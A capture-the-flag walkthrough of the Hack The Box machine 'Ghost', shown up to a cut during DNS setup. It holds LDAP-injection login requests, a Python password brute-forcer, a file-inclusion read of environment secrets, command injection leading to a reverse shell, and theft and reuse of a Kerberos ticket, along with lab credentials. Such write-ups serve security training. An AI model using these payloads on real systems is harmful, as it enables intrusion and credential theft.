Hackthebox: Ghost

Overview

Ghost is an insane-difficulty machine from Hack The Box dealing initially with LDAP injection -> Gitea password bruteforce -> source code review leading to RCE via acquiring a special header -> Kerberos ticket hijacking -> BloodHound Information Gathering -> DNS Spoofing to capture the NTLM hash of the user -> ReadGMSAPassword abuse -> Golden SAML Attack -> ADFS web interface authentication bypass -> MSSQL Command Injection -> SeImpersonatePrivilege abuse using EfsPotato -> Cross-domain Trust abuse -> root flag.

Ghost-info-card

Reconnaissance

PORT     STATE SERVICE               VERSION
53/tcp   open  domain                Simple DNS Plus
80/tcp   open  http                  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp   open  kerberos-sec          Microsoft Windows Kerberos (server time: 2024-07-15 20:47:05Z)
135/tcp  open  msrpc                 Microsoft Windows RPC
139/tcp  open  netbios-ssn           Microsoft Windows netbios-ssn
389/tcp  open  ldap                  Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
443/tcp  open  https?
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http            Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap              Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
1433/tcp open  ms-sql-s              Microsoft SQL Server 2022 16.00.1000.00; RC0+
|_ssl-date: 2024-07-15T20:51:35+00:00; +1m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-15T20:09:33
|_Not valid after:  2054-07-15T20:09:33
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
2179/tcp open  vmrdp?
3268/tcp open  ldap                  Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
3269/tcp open  ssl/globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after:  2124-06-19T15:55:55
3389/tcp open  ms-wbt-server         Microsoft Terminal Services
|_ssl-date: 2024-07-15T20:51:32+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Not valid before: 2024-06-16T15:49:55
|_Not valid after:  2024-12-16T15:49:55
8008/tcp open  http                  nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-generator: Ghost 5.78
|_http-title: Ghost
8443/tcp open  ssl/http              nginx 1.18.0 (Ubuntu)
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=core.ghost.htb
| Subject Alternative Name: DNS:core.ghost.htb
| Not valid before: 2024-06-18T15:14:02
|_Not valid after:  2124-05-25T15:14:02
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Ghost Core
|_Requested resource was /login
Service Info: Host: DC01; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1m15s, deviation: 2s, median: 1m16s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-07-15T20:50:40
|_  start_date: N/A

We can see that we have a windows machine that seems to be our ghost.htb domain controller (we can tell from the 88 kerberos port). Let’s add entries for it in our /etc/hosts file.
We also have a couple web applications deployed on ports 8008 and 8443.

Subdomain enumeration with ffuf

Doing some subdomain enumeration using ffuf we find an interesting intranet:

PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.ghost.htb" -u "http://10.129.231.105:8008"  -fs 7676

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.231.105:8008
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.ghost.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 7676
________________________________________________

[Status: 307, Size: 3968, Words: 52, Lines: 1, Duration: 3058ms]: [0:00:06] :: Errors: 0 ::
    * FUZZ: intranet

Let’s add that to our /etc/hosts file.

Web Application - http://intranet.ghost.htb:8008/

Web Application

We are prompted with a login interface. Since this web app is hosted on a domain controller, we should not rule out that it is using ldap for the login flow.
One of the most common ldap injections is using * both for username and password. Let’s fire up our BurpSuite and do that:
This is the actual login request:

POST /login HTTP/1.1
Host: intranet.ghost.htb:8008
Content-Length: 833
Next-Action: c471eb076ccac91d6f828b671795550fd5925940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/x-component
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEDsVbrSRRZCpBB25
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22login%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Origin: http://intranet.ghost.htb:8008
Referer: http://intranet.ghost.htb:8008/login
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_REF_1"


------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:0"

{"id":"c471eb076ccac91d6f828b671795550fd5925940","bound":"$@1"}
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:1"

[{}]
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_KEY"

k2982904007
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-username"

kujen
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-secret"

kujen
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="0"

[{},"$K1"]
------WebKitFormBoundaryEDsVbrSRRZCpBB25--

And this is the one with our injection:

POST /login HTTP/1.1
Host: intranet.ghost.htb:8008
Content-Length: 833
Next-Action: c471eb076ccac91d6f828b671795550fd5925940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/x-component
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEDsVbrSRRZCpBB25
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22login%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Origin: http://intranet.ghost.htb:8008
Referer: http://intranet.ghost.htb:8008/login
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_REF_1"


------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:0"

{"id":"c471eb076ccac91d6f828b671795550fd5925940","bound":"$@1"}
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:1"

[{}]
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_KEY"

k2982904007
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-username"

*
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-secret"

*
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="0"

[{},"$K1"]
------WebKitFormBoundaryEDsVbrSRRZCpBB25--

And we are in!!

Web Application

We can see this from the new page:

We are currently migrating Gitea to Bitbucket.
Domain logins to Gitea have been disabled.
You can only login with the gitea_temp_principal account and its corresponding intranet token as password.

This means that there is also a Gitea instance with a gitea_temp_principal user. Let’s add that entry to our /etc/hosts and check it out.

Web Application - http://gitea.ghost.htb:8008

Gitea Web Application

We are here. However, we only have a username for the login without any clue for the password.

However, we had this note after loggin in to intranet : For sysadmins: Look in LDAP for the attribute. You can also test the credentials by logging in to intranet. So let’s try bruteforcing the gitea_temp_principalpassword from there.

import string
import requests

url = 'http://intranet.ghost.htb:8008/login'

headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}

params = {
    '1_ldap-username': (None, 'gitea_temp_principal'),
    '1_ldap-secret': (None, '*'),
    '0': (None, '[{},"$K1"]')
}

passwd = ""

while True:
    for _ in string.ascii_lowercase + string.digits:
        params = {
            '1_ldap-username': (None, 'gitea_temp_principal'),
            '1_ldap-secret': (None, f'{passwd}{_}*'),
            '0': (None, '[{},"$K1"]')
        }

        res = requests.post(url, headers=headers, files=params)

        if res.status_code == 303:
            passwd += _
            print(f"Passwd: {passwd}")
            break
    else:
        break

print(passwd)

And we actually got it:

PS C:\Users\0xkujen> python3 .\gitea_bruteforce.py
Passwd: s
Passwd: sz
Passwd: szr
Passwd: szrr
Passwd: szrr8
Passwd: szrr8k
Passwd: szrr8kp
Passwd: szrr8kpc
Passwd: szrr8kpc3
Passwd: szrr8kpc3z
Passwd: szrr8kpc3z6
Passwd: szrr8kpc3z6o
Passwd: szrr8kpc3z6on
Passwd: szrr8kpc3z6onl
Passwd: szrr8kpc3z6onlq
Passwd: szrr8kpc3z6onlqf

gitea_temp_principal:szrr8kpc3z6onlqf

Let’s login to gitea now:

Gitea Web Application

We can see we have blog and intranet projects.

Gitea Blog project - Local File Inclusion

Looking closely at the blog js code, we find this interesting snippet:

Local File Inclusion

the extra parameter is directly used to read a file without sanitization which can lead to lfi.
Let’s leave this for later.

Gitea Intranet Project - X-DEV-INTRANET-KEY

Looking at http://gitea.ghost.htb:8008/ghost-dev/intranet/src/branch/main/backend/src/api/dev/scan.rs , we can directly see a red flag:

Gitea Intranet Project

The url is being directly passed into the shell command without sanitization which can lead to RCE (Remote Code Execution).
Also looking at the imports in this file we can see use crate::api::dev::DevGuard; which leads us to dev.rs where we can see that we require a X-DEV-INTRANET-KEY header to be able to make the request:

Gitea Intranet Project

However, this key is stored inside the environment variables, which we can get using the LFI ;)

Chaining Local File Inclusion to get RCE

Now let’s abuse our LFI through this link where we abuse the extra parameter to get a hold of our environment variables:
http://ghost.htb:8008/ghost/api/content/posts/?key=37395e9e872be56438c83aaca6&extra=../../../../proc/self/environ

And we can instantly see our header key DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe

Now let’s test our RCE:

kujen@kujen:~$ curl -X POST http://intranet.ghost.htb:8008/api-dev/scan -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url":";id"}'
{"is_safe":true,"temp_command_success":true,"temp_command_stdout":"uid=0(root) gid=0(root) groups=0(root)\n","temp_command_stderr":"bash: line 1: intranet_url_check: command not found\n"}kujen@kujen:~$

And we got it!!!!
Let’s now use this to get a reverse shell on system:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49848
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
36b733906694

And we are in!!

Lateral Movement - florence.ramirez

Checking the environment we are in, we can first check our environment variable for anything interesting:

# env
DATABASE_URL=./database.sqlite
ROCKET_ADDRESS=0.0.0.0
HOSTNAME=36b733906694
SHLVL=1
HOME=/root
OLDPWD=/app
LDAP_HOST=ldap://windows-host:389
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
_=klist
RUSTUP_HOME=/usr/local/rustup
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
RUST_VERSION=1.79.0
PWD=/
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
CARGO_HOME=/usr/local/cargo

We could also check our docker-entrypoint.sh bash script under /:

# cat docker-entrypoint.sh
#!/bin/bash

mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
printf 'Host *\n  ControlMaster auto\n  ControlPath ~/.ssh/controlmaster/%%r@%%h:%%p\n  ControlPersist yes' > /root/.ssh/config

exec /app/ghost_intranet

Let’s find and read that controlmaster file:

# find / -name *controlmaster* 2> /dev/null
/root/.ssh/controlmaster
# ls /root/.ssh/controlmaster
florence.ramirez@ghost.htb@dev-workstation:22
# cd /root/.ssh/controlmaster
# ls
florence.ramirez@ghost.htb@dev-workstation:22
# file florence.ramirez@ghost.htb@dev-workstation:22
florence.ramirez@ghost.htb@dev-workstation:22: socket

We can finda florence.ramirez@ghost.htb@dev-workstation:22 socket file probably used to allow florence.ramirez user to connect to this docker environment.
Let’s execute the bash docker entrypoint file and see what we get:

# bash docker-entrypoint.sh
mkdir: cannot create directory '/root/.ssh': File exists
mkdir: cannot create directory '/root/.ssh/controlmaster': File exists
Error: Rocket failed to bind network socket to given address/port.
thread 'main' panicked at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/rocket-0.5.1/src/error.rs:279:9:
aborting due to socket bind error
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
# env
DATABASE_URL=./database.sqlite
ROCKET_ADDRESS=0.0.0.0
HOSTNAME=36b733906694
SHLVL=1
HOME=/root
OLDPWD=/app
LDAP_HOST=ldap://windows-host:389
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
_=docker-entrypoint.sh
RUSTUP_HOME=/usr/local/rustup
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
RUST_VERSION=1.79.0
PWD=/
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
CARGO_HOME=/usr/local/cargo
#

Now checking our environment variables again, we find a new LDAP_BIND_PASSWORD. But its not of much use right now.
However, what we can do is connect directly through ssh on the docker container to this user and try to grab his Kerberos ticket that’s being used for authentication:

# ssh florence.ramirez@ghost.htb@dev-workstation
Pseudo-terminal will not be allocated because stdin is not a terminal.
id
uid=50(florence.ramirez) gid=50(staff) groups=50(staff),51(it)
python3 -c 'import pty;pty.spawn("/bin/bash")'
florence.ramirez@LINUX-DEV-WS01:~$ ls
ls
florence.ramirez@LINUX-DEV-WS01:~$ klist
klist
Ticket cache: FILE:/tmp/krb5cc_50
Default principal: florence.ramirez@GHOST.HTB

Valid starting     Expires            Service principal
04/03/25 18:33:01  04/04/25 04:33:01  krbtgt/GHOST.HTB@GHOST.HTB
        renew until 04/04/25 18:33:01
florence.ramirez@LINUX-DEV-WS01:~$ ls /tmp
ls /tmp
init_success  nmbd-stdout---supervisor-j48_1igi.log
krb5cc_50     winbind-stdout---supervisor-o_401b29.log

And yes! We can find the user ticket under /tmp/krb5cc_50. Let’s transfer that over to our attacker machine by encoding it to base64 and authenticate with it:

florence.ramirez@LINUX-DEV-WS01:~$ cat /tmp/krb5cc_50 | base64
cat /tmp/krb5cc_50 | base64
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

And now let’s authenticate ourselves with it:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ echo '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' | base64 -d > ticket.florence.ramirez.kirbi

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ export KRB5CCNAME=ticket.florence.ramirez.kirbi 
                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ klist
Ticket cache: FILE:ticket.florence.ramirez.kirbi
Default principal: florence.ramirez@GHOST.HTB

Valid starting       Expires              Service principal
04/03/2025 18:38:02  04/04/2025 04:38:02  krbtgt/GHOST.HTB@GHOST.HTB
        renew until 04/04/2025 18:38:02
                                                         

And we can confirm it with this command :

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ nxc smb ghost.htb -u florence.ramirez --use-kcache     
SMB         10.129.231.105  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False)
SMB         10.129.231.105  445    DC01             [+] ghost.htb\florence.ramirez from ccache

Information gathering with BloodHound - DNS Spoofing

Now since we are authenticated, we can gather info with bloodhound:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ bloodhound-python -u 'florence.ramirez' -k -ns 10.129.231.105 -d ghost.htb -c all --zip --use-ldap 
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
  xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
Password: 
INFO: Found AD domain: ghost.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
Traceback (most recent call last):
  File "/usr/bin/bloodhound-python", line 33, in <module>
    sys.exit(load_entry_point('bloodhound==1.7.2', 'console_scripts', 'bloodhound-python')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 343, in main
    bloodhound.run(collect=collect,
  File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 78, in run
    self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect, cache_computers=do_computer_enum)
  File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 571, in prefetch_info
    self.get_objecttype()
  File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 260, in get_objecttype
    self.ldap_connect()
  File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 71, in ldap_connect
    ldap = self.ad.auth.getLDAPConnection(hostname=self.hostname, ip=ip,
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodhound/ad/authentication.py", line 115, in getLDAPConnection
    bound = conn.bind()
            ^^^^^^^^^^^
  File "/home/kali/.local/lib/python3.12/site-packages/ldap3/core/connection.py", line 599, in bind
    self.open(read_server_info=False)
  File "/home/kali/.local/lib/python3.12/site-packages/ldap3/strategy/sync.py", line 57, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/home/kali/.local/lib/python3.12/site-packages/ldap3/strategy/base.py", line 154, in open
    raise LDAPSocketOpenError('invalid server address')
ldap3.core.exceptions.LDAPSocketOpenError: invalid server address

For some reason I kept on getting this error over and over again. Until I setup my own dns server using dnschef, then it worked like a charm:
DNSCHEF config

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ dnschef --fakeip 10.129.231.105 --interface 127.0.0.1
/usr/bin/dnschef:453: SyntaxWarning: invalid escape sequence '\/'
  header += "      / _` | '_ \/ __|/ __| '_ \ / _ \  _|\n"
/usr/bin/dnschef:454: SyntaxWarning: invalid escape sequence '\_'
  header += "     | (_| | | | \__ \ (__| | | |  __/ |  \n"
/usr/bin/dnschef:455: SyntaxWarning: invalid escape sequence '\_'
  header += "      \__,_|_| |_|___/\___|_| |_|\___|_|  \n"
          _                _          __  
         | | version 0.4  | |        / _| 
       __| |_ __  ___  ___| |__   ___| |_ 
      / _` | '_ \/ __|/ __| '_ \ / _ \  _|
     | (_| | | | \__ \ (__| | | |  __/ |  
      \__,_|_| |_|___/\___|_| |_|\___|_|  
